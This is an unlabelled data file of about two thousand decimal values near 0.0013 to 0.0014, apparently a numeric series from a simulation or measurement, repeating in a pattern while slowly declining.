0.001439
0.00143474
0.001439
0.00143473
0.00143473
0.00143475
0.001439
0.00143898
0.00143473
0.001439
0.00143475
0.00143023
0.00142596
0.00143022
0.00143023
0.00142596
0.00141719
0.00142146
0.00142144
0.0014172
0.00142146
0.00141719
0.0014172
0.00141269
0.00141267
0.00140842
0.00140842
0.00141269
0.00141719
0.00142146
0.00141719
0.00142146
0.00141719
0.00141269
0.00141267
0.00140842
0.00140843
0.00140842
0.00141269
0.00141267
0.00141719
0.00142146
0.00142144
0.0014172
0.00142146
0.00141719
0.0014172
0.00141269
0.00141267
0.00140841
0.00141268
0.00140842
0.00141718
0.00142145
0.00141719
0.00142146
0.00141718
0.00141269
0.00141267
0.00140842
0.00140843
0.00141269
0.00141267
0.00140842
0.00143023
0.00142595
0.00142594
0.00143023
0.00143022
0.00142594
0.00143476
0.00143892
0.00143898
0.00143473
0.00143473
0.00143895
0.00143479
0.00143476
0.00143891
0.00143898
0.00143473
0.00143479
0.00143895
0.00143473
0.00143471
0.001439
0.00143899
0.00143472
0.001439
0.00143471
0.00143018
0.00142596
0.00143022
0.00142602
0.00143021
0.00143015
0.00142598
0.00143018
0.00142596
0.00143021
0.00142602
0.00143015
0.00143021
0.00142598
0.00143472
0.00143021
0.00141267
0.00141718
0.00141717
0.00142145
0.00142145
0.00142146
0.00141718
0.00141718
0.00141265
0.00140848
0.00141267
0.00140843
0.00141261
0.00141267
0.00140845
0.00141264
0.00140848
0.00141267
0.00140842
0.00141267
0.00141261
0.00140845
0.00141722
0.00142144
0.00142138
0.00141719
0.00141725
0.00142142
0.00141719
0.00141722
0.00142144
0.00142138
0.00141719
0.00142141
0.00141719
0.00141725
0.00141269
0.00140841
0.00140841
0.00141268
0.00141268
0.0014084
0.00141267
0.00141718
0.00143023
0.00143021
0.00142596
0.00142597
0.00143023
0.00143021
0.00142596
0.00143473
0.001439
0.00143473
0.001439
0.00143472
0.00143473
0.00143474
0.001439
0.00143898
0.00143473
0.001439
0.00143474
0.00143023
0.00142595
0.00143022
0.00143022
0.00142596
0.00141718
0.00142144
0.00142145
0.0014172
0.00142146
0.0014172
0.00141719
0.00141268
0.00141267
0.00140841
0.00140841
0.00141268
0.00141718
0.00142145
0.00141719
0.00142146
0.00141718
0.00141268
0.00141267
0.00140843
0.00140841
0.00140841
0.00141267
0.00141268
0.00141718
0.00142145
0.00142143
0.0014172
0.00142145
0.00141718
0.0014172
0.00141268
0.00141267
0.00140841
0.00141268
0.00140841
0.00141718
0.00142145
0.00141719
0.00142145
0.00141718
0.00141268
0.00141267
0.00140841
0.00140843
0.00141268
0.00141267
0.00140841
0.00143022
0.0014302
0.00142596
0.00142595
0.0014302
0.00143022
0.00142595
0.00143472
0.00143899
0.00143473
0.00143472
0.001439
0.00143472
0.00143474
0.00143897
0.001439
0.00143473
0.001439
0.00143473
0.00143022
0.00142595
0.00143021
0.00143022
0.00142595
0.00143023
0.0014302
0.00142595
0.00142596
0.00143022
0.00143021
0.00142595
0.00143473
0.001439
0.00143473
0.001439
0.00143473
0.00143473
0.00143474
0.001439
0.00143898
0.001439
0.00143473
0.00143474
0.00143023
0.00142595
0.00143021
0.00143022
0.00142595
0.00141718
0.00142143
0.00142145
0.0014172
0.00142145
0.00141719
0.00141718
0.00141268
0.00141267
0.00140841
0.00141268
0.00140841
0.00141718
0.00142145
0.00141719
0.00142145
0.00141718
0.00141268
0.00141266
0.00140843
0.00140841
0.00141267
0.00141268
0.00140841
0.00141718
0.00142145
0.00142143
0.0014172
0.00142145
0.00141718
0.0014172
0.00141268
0.00141267
0.00140841
0.00141268
0.00140842
0.00141718
0.00142145
0.00141719
0.00142145
0.00141718
0.00141269
0.00141267
0.00140842
0.00140843
0.00141268
0.00141267
0.00140842
0.00143023
0.00142595
0.00142595
0.00143023
0.00143023
0.00142594
0.00143476
0.00143892
0.00143898
0.00143473
0.00143473
0.00143896
0.00143479
0.00143476
0.00143892
0.00143898
0.00143473
0.00143479
0.00143896
0.00143473
0.00143472
0.001439
0.001439
0.00143472
0.001439
0.00143472
0.00143019
0.00142596
0.00143022
0.00142602
0.00143021
0.00143016
0.00142599
0.00143019
0.00142596
0.00143022
0.00142602
0.00143016
0.00143021
0.00142599
0.00143473
0.00143022
0.00141268
0.00141719
0.00141717
0.00142145
0.00142146
0.00142146
0.00141718
0.00141718
0.00141265
0.00140848
0.00141267
0.00140842
0.00141261
0.00141267
0.00140845
0.00141265
0.00140848
0.00141268
0.00140842
0.00141267
0.00141261
0.00140845
0.00141722
0.00142144
0.00142138
0.00141719
0.00141725
0.00142141
0.00141719
0.00141722
0.00142144
0.00142138
0.00141719
0.00142141
0.00141719
0.00141725
0.00141269
0.00140841
0.00140841
0.00141268
0.00141268
0.0014084
0.00141268
0.00141719
0.00143023
0.00143021
0.00142597
0.00142596
0.00143021
0.00143023
0.00142596
0.00143473
0.001439
0.00143474
0.00143473
0.001439
0.00143473
0.00143475
0.00143898
0.001439
0.00143474
0.001439
0.00143473
0.00143023
0.00142596
0.00143022
0.00143023
0.00142596
0.00143023
0.00143021
0.00142596
0.00142596
0.00143021
0.00143023
0.00142596
0.00143473
0.00143899
0.00143473
0.001439
0.00143473
0.00143473
0.00143475
0.00143898
0.001439
0.001439
0.00143474
0.00143473
0.00143023
0.00142595
0.00143021
0.00143022
0.00142596
0.00141719
0.00142144
0.00142146
0.0014172
0.00142146
0.0014172
0.00141719
0.00141269
0.00141268
0.00140842
0.00141269
0.00140842
0.00141719
0.00142146
0.0014172
0.00142146
0.00141719
0.00141269
0.00141267
0.00140843
0.00140842
0.00141267
0.00141269
0.00140842
0.00141719
0.00142144
0.00142146
0.0014172
0.00142146
0.0014172
0.00141719
0.00141269
0.00141267
0.00140841
0.00141268
0.00140841
0.00141718
0.00142145
0.00141719
0.00142146
0.00141718
0.00141269
0.00141267
0.00140843
0.00140842
0.00141267
0.00141268
0.00140841
0.00143473
0.00143022
0.00143473
0.00143022
0.00141717
0.00142145
0.00142145
0.00142146
0.00141718
0.00141718
0.00141265
0.00140848
0.00141267
0.00140842
0.00140844
0.00141261
0.00141267
0.00141265
0.00140848
0.00141267
0.00140842
0.00140845
0.00141261
0.00141267
0.00141722
0.00142144
0.00142138
0.00141719
0.00142141
0.00141725
0.00141719
0.00141722
0.00142144
0.00142138
0.00141719
0.00142141
0.00141725
0.00141719
0.00141269
0.00140841
0.00140841
0.0014084
0.00141268
0.00141268
0.00141268
0.00141718
0.00141268
0.00141719
0.00139965
0.00139514
0.00139964
0.00139514
0.00139515
0.00139087
0.00139087
0.00139514
0.00139514
0.00139086
0.00139967
0.00140384
0.0014039
0.00139965
0.00140387
0.00139965
0.00139971
0.00139967
0.00140384
0.0014039
0.00139965
0.00140387
0.00139965
0.00139971
0.00139963
0.00140391
0.00140391
0.00140392
0.00139964
0.00139964
0.0013951
0.00139088
0.00139513
0.00139094
0.00139513
0.0013909
0.00139507
0.0013951
0.00139088
0.00139513
0.00139094
0.00139513
0.0013909
0.00139507
0.0013776
0.00138211
0.0013776
0.00138211
0.0013821
0.00138638
0.00138638
0.00138638
0.0013821
0.0013821
0.00137757
0.0013734
0.0013776
0.00137335
0.00137759
0.00137753
0.00137337
0.00137757
0.0013734
0.00137759
0.00137334
0.00137759
0.00137753
0.00137337
0.00138214
0.00138636
0.0013863
0.00138211
0.00138634
0.00138211
0.00138217
0.00138214
0.00138636
0.0013863
0.00138211
0.00138634
0.00138211
0.00138217
0.00137761
0.00137333
0.00137333
0.00137761
0.00137761
0.00137333
0.00139515
0.00139513
0.00139088
0.00139089
0.00139514
0.00139513
0.00139088
0.00139965
0.00140392
0.00139965
0.00140392
0.00139964
0.00139965
0.00139966
0.00140391
0.0014039
0.00139965
0.00140392
0.00139966
0.00139515
0.00139087
0.00139513
0.00139514
0.00139088
0.0013821
0.00138637
0.00138636
0.00138212
0.00138637
0.00138211
0.00138212
0.00137761
0.00137759
0.00137334
0.00137334
0.00137761
0.00138211
0.00138637
0.00138211
0.00138637
0.0013821
0.00137761
0.00137759
0.00137334
0.00137335
0.00137334
0.00137761
0.00137759
0.00138211
0.00138637
0.00138636
0.00138212
0.00138638
0.00138211
0.00138212
0.00137761
0.0013776
0.00137333
0.00137761
0.00137334
0.00138211
0.00138637
0.00138212
0.00138638
0.00138211
0.00137761
0.00137759
0.00137334
0.00137335
0.0013776
0.00137759
0.00137334
0.00139515
0.00139087
0.00139087
0.00139515
0.00139515
0.00139087
0.00139968
0.00140384
0.00140391
0.00139965
0.00139965
0.00140388
0.00139971
0.00139968
0.00140384
0.0014039
0.00139965
0.00139971
0.00140387
0.00139965
0.00139963
0.00140392
0.00140392
0.00139964
0.00140392
0.00139964
0.0013951
0.00139088
0.00139514
0.00139094
0.00139513
0.00139507
0.00139091
0.0013951
0.00139088
0.00139513
0.00139094
0.00139507
0.00139513
0.00139091
0.00139965
0.00139514
0.0013776
0.00138211
0.0013821
0.00138638
0.00138638
0.00138638
0.0013821
0.0013821
0.00137757
0.0013734
0.0013776
0.00137334
0.00137754
0.0013776
0.00137337
0.00137757
0.0013734
0.00137759
0.00137334
0.00137759
0.00137753
0.00137337
0.00138214
0.00138636
0.0013863
0.00138211
0.00138217
0.00138634
0.00138212
0.00138214
0.00138636
0.00138629
0.00138211
0.00138634
0.00138211
0.00138217
0.00137761
0.00137333
0.00137333
0.00137761
0.00137761
0.00137333
0.0013776
0.0013821
0.00139515
0.00139512
0.00139088
0.00139089
0.00139514
0.00139513
0.00139088
0.00139964
0.00140391
0.00139965
0.00140391
0.00139964
0.00139964
0.00139966
0.00140391
0.00140389
0.00139965
0.00140391
0.00139965
0.00139515
0.00139087
0.00139513
0.00139514
0.00139088
0.0013821
0.00138636
0.00138638
0.00138212
0.00138638
0.00138212
0.00138211
0.0013776
0.00137759
0.00137333
0.00137334
0.0013776
0.0013821
0.00138637
0.00138211
0.00138637
0.0013821
0.0013776
0.00137759
0.00137334
0.00137334
0.00137333
0.00137759
0.0013776
0.00138211
0.00138638
0.00138636
0.00138212
0.00138638
0.00138211
0.00138212
0.0013776
0.00137759
0.00137333
0.0013776
0.00137333
0.0013821
0.00138637
0.00138211
0.00138638
0.0013821
0.00137761
0.00137759
0.00137334
0.00137335
0.0013776
0.00137759
0.00137334
0.00139514
0.00139512
0.00139088
0.00139087
0.00139513
0.00139514
0.00139087
0.00139964
0.00140391
0.00139965
0.00139964
0.00140391
0.00139964
0.00139966
0.0014039
0.00140391
0.00139965
0.00140391
0.00139964
0.00139514
0.00139087
0.00139513
0.00139514
0.00139087
0.00139514
0.00139512
0.00139087
0.00139088
0.00139514
0.00139513
0.00139087
0.00139964
0.00140391
0.00139965
0.00140391
0.00139964
0.00139964
0.00139966
0.00140391
0.0014039
0.00140391
0.00139964
0.00139966
0.00139514
0.00139087
0.00139513
0.00139514
0.00139087
0.0013821
0.00138635
0.00138637
0.00138212
0.00138637
0.00138211
0.0013821
0.0013776
0.00137759
0.00137333
0.0013776
0.00137333
0.0013821
0.00138637
0.00138211
0.00138637
0.0013821
0.0013776
0.00137759
0.00137335
0.00137334
0.00137759
0.0013776
0.00137333
0.0013821
0.00138637
0.00138635
0.00138212
0.00138637
0.0013821
0.00138212
0.0013776
0.00137759
0.00137333
0.0013776
0.00137334
0.0013821
0.00138637
0.00138211
0.00138637
0.0013821
0.0013776
0.00137759
0.00137334
0.00137335
0.0013776
0.00137759
0.00137334
0.00139515
0.00139087
0.00139087
0.00139514
0.00139514
0.00139086
0.00139967
0.00140384
0.0014039
0.00139965
0.00139965
0.00140387
0.00139971
0.00139967
0.00140384
0.0014039
0.00139965
0.00139971
0.00140387
0.00139965
0.00139963
0.00140391
0.00140391
0.00139964
0.00140392
0.00139964
0.0013951
0.00139088
0.00139513
0.00139094
0.00139513
0.00139507
0.0013909
0.0013951
0.00139088
0.00139513
0.00139094
0.00139507
0.00139513
0.0013909
0.00139965
0.00139514
0.00137759
0.0013821
0.00138209
0.00138637
0.00138638
0.00138638
0.0013821
0.0013821
0.00137757
0.0013734
0.00137759
0.00137334
0.00137753
0.00137759
0.00137337
0.00137757
0.0013734
0.0013776
0.00137334
0.00137759
0.00137753
0.00137337
0.00138214
0.00138636
0.0013863
0.00138211
0.00138217
0.00138633
0.00138211
0.00138214
0.00138636
0.0013863
0.00138211
0.00138633
0.00138211
0.00138217
0.00137761
0.00137333
0.00137333
0.0013776
0.00137761
0.00137332
0.0013776
0.00138211
0.00139514
0.00139512
0.00139089
0.00139087
0.00139513
0.00139514
0.00139087
0.00139964
0.00140391
0.00139965
0.00139964
0.00140392
0.00139964
0.00139966
0.0014039
0.00140391
0.00139966
0.00140392
0.00139965
0.00139514
0.00139087
0.00139513
0.00139514
0.00139087
0.00139514
0.00139512
0.00139089
0.00139087
0.00139512
0.00139514
0.00139087
0.00139964
0.00140391
0.00139965
0.00140391
0.00139964
0.00139964
0.00139966
0.00140389
0.00140391
0.00140391
0.00139965
0.00139964
0.00139514
0.00139087
0.00139513
0.00139514
0.00139087
0.0013821
0.00138636
0.00138637
0.00138212
0.00138637
0.00138212
0.00138211
0.00137761
0.0013776
0.00137334
0.00137761
0.00137334
0.0013821
0.00138637
0.00138211
0.00138637
0.0013821
0.00137761
0.00137759
0.00137335
0.00137334
0.00137759
0.0013776
0.00137334
0.00138211
0.00138636
0.00138637
0.00138212
0.00138637
0.00138212
0.00138211
0.00137761
0.0013776
0.00137334
0.00137761
0.00137334
0.00138211
0.00138637
0.00138211
0.00138637
0.0013821
0.00137761
0.00137759
0.00137335
0.00137334
0.00137759
0.00137761
0.00137334
0.00139965
0.00139514
0.00139965
0.00139514
0.0013821
0.00138638
0.00138638
0.00138638
0.0013821
0.0013821
0.00137757
0.0013734
0.0013776
0.00137335
0.00137337
0.00137754
0.0013776
0.00137757
0.0013734
0.0013776
0.00137335
0.00137337
0.00137754
0.0013776
0.00138214
0.00138637
0.0013863
0.00138211
0.00138634
0.00138217
0.00138212
0.00138214
0.00138636
0.0013863
0.00138211
0.00138634
0.00138217
0.00138211
0.00137761
0.00137333
0.00137333
0.00137333
0.00137761
0.00137761
0.0013776
0.00138211
0.0013776
0.00138211
0.00136457
0.00136006
0.00136457
0.00136006
0.00136007
0.0013558
0.0013558
0.00136007
0.00136007
0.00135579
0.0013646
0.00136877
0.00136883
0.00136457
0.0013688
0.00136458
0.00136463
0.0013646
0.00136876
0.00136882
0.00136457
0.0013688
0.00136458
0.00136463
0.00136456
0.00136884
0.00136884
0.00136884
0.00136456
0.00136456
0.00136003
0.00135581
0.00136006
0.00135587
0.00136006
0.00135583
0.00136
0.00136003
0.00135581
0.00136006
0.00135587
0.00136006
0.00135583
0.00136
0.00134253
0.00134704
0.00134253
0.00134704
0.00134703
0.00135131
0.00135131
0.00135131
0.00134703
0.00134703
0.0013425
0.00133833
0.00134253
0.00133828
0.00134252
0.00134246
0.0013383
0.0013425
0.00133833
0.00134253
0.00133828
0.00134253
0.00134246
0.0013383
0.00134707
0.00135129
0.00135123
0.00134704
0.00135127
0.00134704
0.0013471
0.00134707
0.00135129
0.00135123
0.00134704
0.00135127
0.00134704
0.0013471
0.00134254
0.00133826
0.00133826
0.00134254
0.00134254
0.00133826
0.00136007
0.00136004
0.0013558
0.00135581
0.00136006
0.00136005
0.0013558
0.00136457
0.00136883
0.00136457
0.00136884
0.00136456
0.00136456
0.00136458
0.00136884
0.00136882
0.00136457
0.00136884
0.00136458
0.00136007
0.0013558
0.00136006
0.00136007
0.0013558
0.00134703
0.0013513
0.00135128
0.00134705
0.0013513
0.00134703
0.00134705
0.00134254
0.00134253
0.00133826
0.00133827
0.00134254
0.00134703
0.0013513
0.00134704
0.0013513
0.00134703
0.00134253
0.00134252
0.00133827
0.00133828
0.00133826
0.00134253
0.00134252
0.00134703
0.0013513
0.00135128
0.00134705
0.0013513
0.00134703
0.00134704
0.00134253
0.00134252
0.00133826
0.00134253
0.00133826
0.00134703
0.0013513
0.00134704
0.0013513
0.00134703
0.00134253
0.00134252
0.00133827
0.00133828
0.00134253
0.00134252
0.00133826
0.00136007
0.00135579
0.00135579
0.00136007
0.00136007
0.00135579
0.0013646
0.00136876
0.00136882
0.00136457
0.00136457
0.0013688
0.00136463
0.0013646
0.00136876
0.00136882
0.00136457
0.00136463
0.00136879
0.00136457
0.00136455
0.00136884
0.00136884
0.00136456
0.00136884
0.00136456
0.00136003
0.00135581
0.00136006
0.00135587
0.00136005
0.00136
0.00135583
0.00136003
0.00135581
0.00136006
0.00135587
0.00136
0.00136005
0.00135583
0.00136457
0.00136006
0.00134253
0.00134703
0.00134702
0.0013513
0.0013513
0.00135131
0.00134703
0.00134703
0.0013425
0.00133833
0.00134252
0.00133827
0.00134246
0.00134252
0.0013383
0.0013425
0.00133833
0.00134253
0.00133827
0.00134252
0.00134246
0.0013383
0.00134707
0.00135129
0.00135122
0.00134704
0.0013471
0.00135126
0.00134704
0.00134707
0.00135129
0.00135122
0.00134704
0.00135126
0.00134704
0.0013471
0.00134254
0.00133826
0.00133826
0.00134254
0.00134254
0.00133826
0.00134253
0.00134703
0.00136007
0.00136005
0.0013558
0.00135581
0.00136007
0.00136005
0.0013558
0.00136457
0.00136883
0.00136457
0.00136884
0.00136457
0.00136457
0.00136458
0.00136883
0.00136882
0.00136457
0.00136884
0.00136458
0.00136007
0.0013558
0.00136006
0.00136007
0.0013558
0.00134703
0.00135128
0.0013513
0.00134705
0.0013513
0.00134704
0.00134703
0.00134253
0.00134252
0.00133826
0.00133826
0.00134253
0.00134703
0.0013513
0.00134704
0.0013513
0.00134703
0.00134253
0.00134251
0.00133827
0.00133826
0.00133826
0.00134252
0.00134253
0.00134703
0.0013513
0.00135128
0.00134705
0.0013513
0.00134703
0.00134704
0.00134254
0.00134252
0.00133827
0.00134253
0.00133827
0.00134703
0.0013513
0.00134704
0.0013513
0.00134703
0.00134254
0.00134252
0.00133827
0.00133828
0.00134253
0.00134252
0.00133827
0.00136007
0.00136005
0.00135581
0.0013558
0.00136005
0.00136007
0.0013558
0.00136457
0.00136883
0.00136457
0.00136456
0.00136884
0.00136457
0.00136459
0.00136882
0.00136883
0.00136458
0.00136884
0.00136457
0.00136007
0.0013558
0.00136005
0.00136007
0.0013558
0.00136007
0.00136005
0.0013558
0.00135581
0.00136007
0.00136006
0.0013558
0.00136457
0.00136884
0.00136457
0.00136884
0.00136457
0.00136457
0.00136458
0.00136884
0.00136882
0.00136884
0.00136457
0.00136458
0.00136007
0.0013558
0.00136006
0.00136007
0.0013558
0.00134703
0.00135129
0.0013513
0.00134705
0.0013513
0.00134705
0.00134704
0.00134253
0.00134252
0.00133827
0.00134253
0.00133827
0.00134703
0.0013513
0.00134704
0.0013513
0.00134703
0.00134254
0.00134252
0.00133828
0.00133827
0.00134252
0.00134253
0.00133827
0.00134704
0.0013513
0.00135129
0.00134705
0.0013513
0.00134704
0.00134705
0.00134254
0.00134252
0.00133826
0.00134254
0.00133827
0.00134704
0.0013513
0.00134704
0.0013513
0.00134703
0.00134254
0.00134252
0.00133827
0.00133828
0.00134254
0.00134252
0.00133827
0.00136007
0.0013558
0.0013558
0.00136007
0.00136007
0.00135579
0.0013646
0.00136876
0.00136882
0.00136457
0.00136458
0.0013688
0.00136463
0.0013646
0.00136876
0.00136882
0.00136457
0.00136464
0.0013688
0.00136458
0.00136456
0.00136884
0.00136884
0.00136456
0.00136884
0.00136456
0.00136003
0.00135581
0.00136006
0.00135587
0.00136006
0.00136
0.00135584
0.00136003
0.00135581
0.00136006
0.00135587
0.00136
0.00136006
0.00135583
0.00136457
0.00136006
0.00134253
0.00134704
0.00134703
0.00135131
0.00135131
0.00135131
0.00134703
0.00134703
0.0013425
0.00133833
0.00134252
0.00133828
0.00134246
0.00134252
0.0013383
0.0013425
0.00133833
0.00134253
0.00133828
0.00134253
0.00134246
0.0013383
0.00134707
0.00135129
0.00135123
0.00134704
0.0013471
0.00135126
0.00134704
0.00134707
0.00135129
0.00135123
0.00134704
0.00135127
0.00134705
0.0013471
0.00134254
0.00133826
0.00133826
0.00134254
0.00134254
0.00133826
0.00134253
0.00134704
0.00136007
0.00136005
0.00135581
0.0013558
0.00136005
0.00136007
0.0013558
0.00136457
0.00136884
0.00136458
0.00136457
0.00136884
0.00136457
0.00136459
0.00136882
0.00136884
0.00136458
0.00136884
0.00136457
0.00136007
0.0013558
0.00136006
0.00136007
0.0013558
0.00136007
0.00136005
0.00135582
0.0013558
0.00136005
0.00136007
0.0013558
0.00136457
0.00136884
0.00136457
0.00136884
0.00136457
0.00136457
0.00136459
0.00136882
0.00136884
0.00136884
0.00136458
0.00136457
0.00136007
0.0013558
0.00136006
0.00136007
0.0013558
0.00134703
0.00135128
0.0013513
0.00134705
0.0013513
0.00134705
0.00134704
0.00134254
0.00134252
0.00133826
0.00134253
0.00133827
0.00134703
0.0013513
0.00134704
0.0013513
0.00134703
0.00134254
0.00134252
0.00133828
0.00133827
0.00134252
0.00134253
0.00133827
0.00134703
0.00135129
0.0013513
0.00134705
0.0013513
0.00134705
0.00134703
0.00134253
0.00134252
0.00133826
0.00134253
0.00133826
0.00134703
0.0013513
0.00134704
0.0013513
0.00134703
0.00134253
0.00134252
0.00133828
0.00133826
0.00134252
0.00134253
0.00133826
0.00136457
0.00136006
0.00136457
0.00136006
0.00134702
0.0013513
0.0013513
0.00135131
0.00134703
0.00134703
0.0013425
0.00133833
0.00134252
0.00133827
0.0013383
0.00134246
0.00134252
0.0013425
0.00133833
0.00134252
0.00133827
0.0013383
0.00134246
0.00134252
0.00134707
0.00135129
0.00135122
0.00134704
0.00135126
0.0013471
0.00134704
0.00134707
0.00135129
0.00135123
0.00134704
0.00135126
0.0013471
0.00134704
0.00134254
0.00133826
0.00133826
0.00133825
0.00134253
0.00134254
0.00134252
0.00134703
0.00134253
0.00134703
0.0013295
0.00132499
0.0013295
0.00132499
0.001325
0.00132072
0.00132072
0.001325
0.001325
0.00132072
0.00132953
0.00133369
0.00133376
0.00132951
0.00133373
0.00132951
0.00132956
0.00132953
0.00133369
0.00133376
0.00132951
0.00133373
0.00132951
0.00132956
0.00132949
0.00133377
0.00133377
0.00133378
0.0013295
0.00132949
0.00132496
0.00132073
0.00132499
0.00132079
0.00132498
0.00132076
0.00132492
0.00132496
0.00132074
0.00132499
0.00132079
0.00132498
0.00132076
0.00132492
0.00130745
0.00131196
0.00130745
0.00131196
0.00131195
0.00131623
0.00131623
0.00131623
0.00131195
0.00131195
0.00130742
0.00130325
0.00130745
0.00130319
0.00130744
0.00130738
0.00130322
0.00130742
0.00130325
0.00130745
0.00130319
0.00130744
0.00130739
0.00130322
0.00131199
0.00131621
0.00131615
0.00131196
0.00131619
0.00131196
0.00131202
0.00131199
0.00131622
0.00131615
0.00131196
0.00131619
0.00131197
0.00131202
0.00130746
0.00130318
0.00130318
0.00130746
0.00130746
0.00130317
0.001325
0.00132498
0.00132073
0.00132074
0.00132499
0.00132498
0.00132073
0.00132949
0.00133376
0.0013295
0.00133376
0.00132949
0.00132949
0.00132951
0.00133376
0.00133374
0.0013295
0.00133376
0.00132951
0.001325
0.00132073
0.00132498
0.001325
0.00132073
0.00131195
0.00131622
0.00131621
0.00131197
0.00131622
0.00131196
0.00131196
0.00130745
0.00130744
0.00130318
0.00130318
0.00130745
0.00131195
0.00131622
0.00131196
0.00131622
0.00131195
0.00130745
0.00130744
0.00130319
0.0013032
0.00130318
0.00130745
0.00130744
0.00131196
0.00131622
0.00131621
0.00131197
0.00131623
0.00131196
0.00131197
0.00130746
0.00130744
0.00130319
0.00130746
0.00130319
0.00131196
0.00131623
0.00131196
0.00131623
0.00131196
0.00130746
0.00130744
0.00130319
0.0013032
0.00130745
0.00130744
0.00130319
0.001325
0.00132072
0.00132072
0.001325
0.001325
0.00132072
0.00132953
0.00133369
0.00133375
0.0013295
0.0013295
0.00133373
0.00132956
0.00132953
0.00133369
0.00133376
0.0013295
0.00132956
0.00133373
0.00132951
0.00132949
0.00133377
0.00133377
0.00132949
0.00133377
0.00132949
0.00132496
0.00132073
0.00132498
0.00132079
0.00132498
0.00132492
0.00132076
0.00132496
0.00132074
0.00132499
0.00132079
0.00132492
0.00132498
0.00132076
0.0013295
0.00132499
0.00130745
0.00131196
0.00131195
0.00131623
0.00131623
0.00131623
0.00131195
0.00131195
0.00130742
0.00130325
0.00130744
0.00130319
0.00130738
0.00130744
0.00130322
0.00130742
0.00130325
0.00130745
0.00130319
0.00130744
0.00130738
0.00130322
0.00131199
0.00131621
0.00131615
0.00131196
0.00131202
0.00131619
0.00131197
0.00131199
0.00131622
0.00131615
0.00131196
0.00131619
0.00131197
0.00131202
0.00130746
0.00130318
0.00130318
0.00130746
0.00130746
0.00130318
0.00130745
0.00131196
0.001325
0.00132498
0.00132073
0.00132074
0.001325
0.00132498
0.00132073
0.0013295
0.00133377
0.0013295
0.00133377
0.0013295
0.0013295
0.00132951
0.00133376
0.00133375
0.0013295
0.00133377
0.00132951
0.001325
0.00132072
0.00132498
0.00132499
0.00132073
0.00131196
0.00131621
0.00131623
0.00131198
0.00131623
0.00131197
0.00131196
0.00130746
0.00130744
0.00130318
0.00130319
0.00130745
0.00131196
0.00131622
0.00131196
0.00131623
0.00131196
0.00130746
0.00130744
0.0013032
0.00130319
0.00130319
0.00130744
0.00130746
0.00131196
0.00131623
0.00131621
0.00131197
0.00131623
0.00131196
0.00131197
0.00130745
0.00130744
0.00130318
0.00130745
0.00130318
0.00131195
0.00131622
0.00131196
0.00131623
0.00131195
0.00130746
0.00130744
0.00130319
0.0013032
0.00130745
0.00130744
0.00130319
0.001325
0.00132498
0.00132074
0.00132073
0.00132498
0.00132499
0.00132072
0.0013295
0.00133377
0.0013295
0.00132949
0.00133377
0.00132949
0.00132952
0.00133375
0.00133377
0.00132951
0.00133377
0.0013295
0.001325
0.00132072
0.00132498
0.00132499
0.00132073
0.00132499
0.00132498
0.00132072
0.00132074
0.00132499
0.00132498
0.00132072
0.00132949
0.00133376
0.0013295
0.00133377
0.00132949
0.00132949
0.00132951
0.00133376
0.00133375
0.00133376
0.0013295
0.00132951
0.001325
0.00132072
0.00132498
0.00132499
0.00132073
0.00131195
0.00131621
0.00131622
0.00131197
0.00131622
0.00131197
0.00131196
0.00130746
0.00130744
0.00130318
0.00130745
0.00130319
0.00131195
0.00131622
0.00131196
0.00131622
0.00131195
0.00130745
0.00130744
0.0013032
0.00130319
0.00130744
0.00130745
0.00130319
0.00131196
0.00131622
0.00131621
0.00131197
0.00131623
0.00131196
0.00131197
0.00130746
0.00130744
0.00130318
0.00130745
0.00130318
0.00131196
0.00131622
0.00131196
0.00131623
0.00131195
0.00130746
0.00130744
0.00130319
0.0013032
0.00130746
0.00130744
0.00130319
0.001325
0.00132072
0.00132072
0.001325
0.001325
0.00132072
0.00132953
0.00133369
0.00133376
0.0013295
0.0013295
0.00133373
0.00132956
0.00132953
0.00133369
0.00133376
0.0013295
0.00132956
0.00133373
0.00132951
0.00132949
0.00133377
0.00133377
0.00132949
0.00133377
0.00132949
0.00132496
0.00132073
0.00132499
0.00132079
0.00132498
0.00132492
0.00132076
0.00132496
0.00132074
0.00132499
0.00132079
0.00132493
0.00132498
0.00132076
0.0013295
0.00132499
0.00130745
0.00131196
0.00131195
0.00131623
0.00131623
0.00131623
0.00131195
0.00131195
0.00130742
0.00130325
0.00130745
0.0013032
0.00130738
0.00130745
0.00130322
0.00130742
0.00130325
0.00130745
0.0013032
0.00130745
0.00130739
0.00130322
0.00131199
0.00131621
0.00131615
0.00131196
0.00131202
0.00131619
0.00131197
0.00131199
0.00131622
0.00131615
0.00131196
0.00131619
0.00131197
0.00131202
0.00130746
0.00130318
0.00130318
0.00130746
0.00130746
0.00130318
0.00130745
0.00131196
0.001325
0.00132498
0.00132074
0.00132073
0.00132498
0.001325
0.00132073
0.0013295
0.00133377
0.00132951
0.0013295
0.00133377
0.0013295
0.00132952
0.00133375
0.00133377
0.00132951
0.00133377
0.0013295
0.001325
0.00132073
0.00132499
0.001325
0.00132073
0.00132499
0.00132498
0.00132074
0.00132073
0.00132498
0.00132499
0.00132073
0.00132949
0.00133376
0.0013295
0.00133376
0.00132949
0.00132949
0.00132951
0.00133375
0.00133376
0.00133376
0.00132951
0.0013295
0.001325
0.00132073
0.00132498
0.00132499
0.00132073
0.00131196
0.00131621
0.00131623
0.00131197
0.00131623
0.00131197
0.00131196
0.00130746
0.00130745
0.00130319
0.00130746
0.00130319
0.00131196
0.00131623
0.00131197
0.00131623
0.00131196
0.00130746
0.00130744
0.0013032
0.00130319
0.00130744
0.00130746
0.00130319
0.00131196
0.00131621
0.00131623
0.00131198
0.00131623
0.00131197
0.00131196
0.00130746
0.00130745
0.00130319
0.00130746
0.00130319
0.00131196
0.00131623
0.00131197
0.00131623
0.00131196
0.00130746
0.00130744
0.0013032
0.00130319
0.00130744
0.00130746
0.00130319
0.0013295
0.00132499
0.0013295
0.00132499
0.00131195
0.00131623
0.00131623
0.00131623
0.00131195
0.00131195
0.00130742
0.00130325
0.00130745
0.0013032
0.00130322
0.00130739
0.00130745
0.00130742
0.00130325
0.00130745
0.0013032
0.00130322
0.00130739
0.00130745
0.00131199
0.00131622
0.00131615
0.00131196
0.00131619
0.00131202
0.00131197
0.001312
0.00131622
0.00131615
0.00131197
0.00131619
0.00131202
0.00131197
0.00130746
0.00130318
0.00130318
0.00130318
0.00130746
0.00130746
0.00130745
0.00131196
0.00130745
0.00131196
0.00129442
0.00128991
0.00129441
0.0012899
0.00128992
0.00128564
0.00128564
0.00128991
0.00128991
0.00128563
0.00129445
0.00129861
0.00129867
0.00129442
0.00129864
0.00129442
0.00129448
0.00129444
0.00129861
0.00129867
0.00129442
0.00129864
0.00129442
0.00129448
0.0012944
0.00129869
0.00129869
0.00129869
0.00129441
